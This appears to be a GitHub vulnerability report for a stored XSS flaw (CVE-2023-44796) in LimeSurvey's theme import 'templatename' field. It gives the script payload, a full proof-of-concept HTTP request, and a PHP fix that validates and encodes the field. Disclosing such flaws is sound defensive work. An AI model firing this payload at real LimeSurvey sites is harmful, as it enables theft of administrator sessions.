LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey #4

Open
Hebing123 opened this issue Dec 14, 2023 · 1 comment

Comments

Hebing123 commented Dec 14, 2023

LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey

Description

A regular user with "theme" privileges who maliciously sets the "templatename" during the importManifest process can lead to a stored Cross-Site Scripting (XSS) vulnerability.

Proof of Concept

The first step is to create a user with only 'theme' permission.
Log in as this user and make a request to /index.php/themeOptions/importManifest.
Payload:
"><script>alert(1)</script>//

Request:

POST /index.php/themeOptions/importManifest HTTP/1.1
Host: 192.168.160.130
Content-Length: 362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.160.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.160.130/index.php/themeOptions/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: []
Connection: close

------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
Content-Disposition: form-data; name="YII_CSRF_TOKEN"

cEVmTmlNRXlqNVFBSl9qYnVGUmtjd2VZUHJtQ0F1UG5pEjQOU-SeXW7To0RH9_rPINh_thglgRaA23WdYDqjUA==
------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx
Content-Disposition: form-data; name="templatename"

123"><script>alert(1)</script>//
------WebKitFormBoundaryQ5Fx3ILX1P8Y4aCx--

When administrators or other users access http://192.168.160.130/index.php/themeOptions, they will be subjected to stored XSS attacks.

Impact

Attackers can import a templatename containing a payload to execute JavaScript code and hijack the administrator’s cookie.
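As an added illustration of the class of fix this report calls for (example code, not LimeSurvey's own), the handler below allowlists the templatename parameter before it is stored and HTML-encodes it wherever it is rendered; the regex, length limit and function names are assumptions.

```php
<?php
// Added defensive example (not LimeSurvey's code): allowlist the
// "templatename" parameter of the importManifest request and encode it
// on output, so a value like the payload in this report is rejected
// before storage and could not render as markup even if it were stored.

/**
 * Validate a theme/template name against an allowlist.
 * Returns the name when it is safe, or null when it must be rejected.
 * The pattern and length limit are this example's assumptions.
 */
function validateTemplateName(string $name): ?string
{
    // Letters, digits, underscore and hyphen only; 1..64 characters.
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name) === 1 ? $name : null;
}

/**
 * Encode a stored name for HTML text or a double-quoted attribute,
 * which is the injection context the payload in this report targets.
 */
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: a benign name and the payload quoted in the report.
$inputs = [
    'my_theme',
    '123"><script>alert(1)</script>//',
];

foreach ($inputs as $input) {
    $valid = validateTemplateName($input);
    if ($valid === null) {
        // Reject at import time; log the encoded value, never the raw one.
        echo 'rejected: ' . encodeForHtml($input) . PHP_EOL;
        continue;
    }
    // Even a validated name is encoded at render time (defence in depth).
    echo '<option value="' . encodeForHtml($valid) . '">'
        . encodeForHtml($valid) . '</option>' . PHP_EOL;
}
```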

tiborpacalat marked this as fixed in 6.2.9+230925 with commit 135511 2 months ago


Hebing123 commented Jan 11, 2024

This is the vulnerability exploitation reference for CVE-2023-44796.
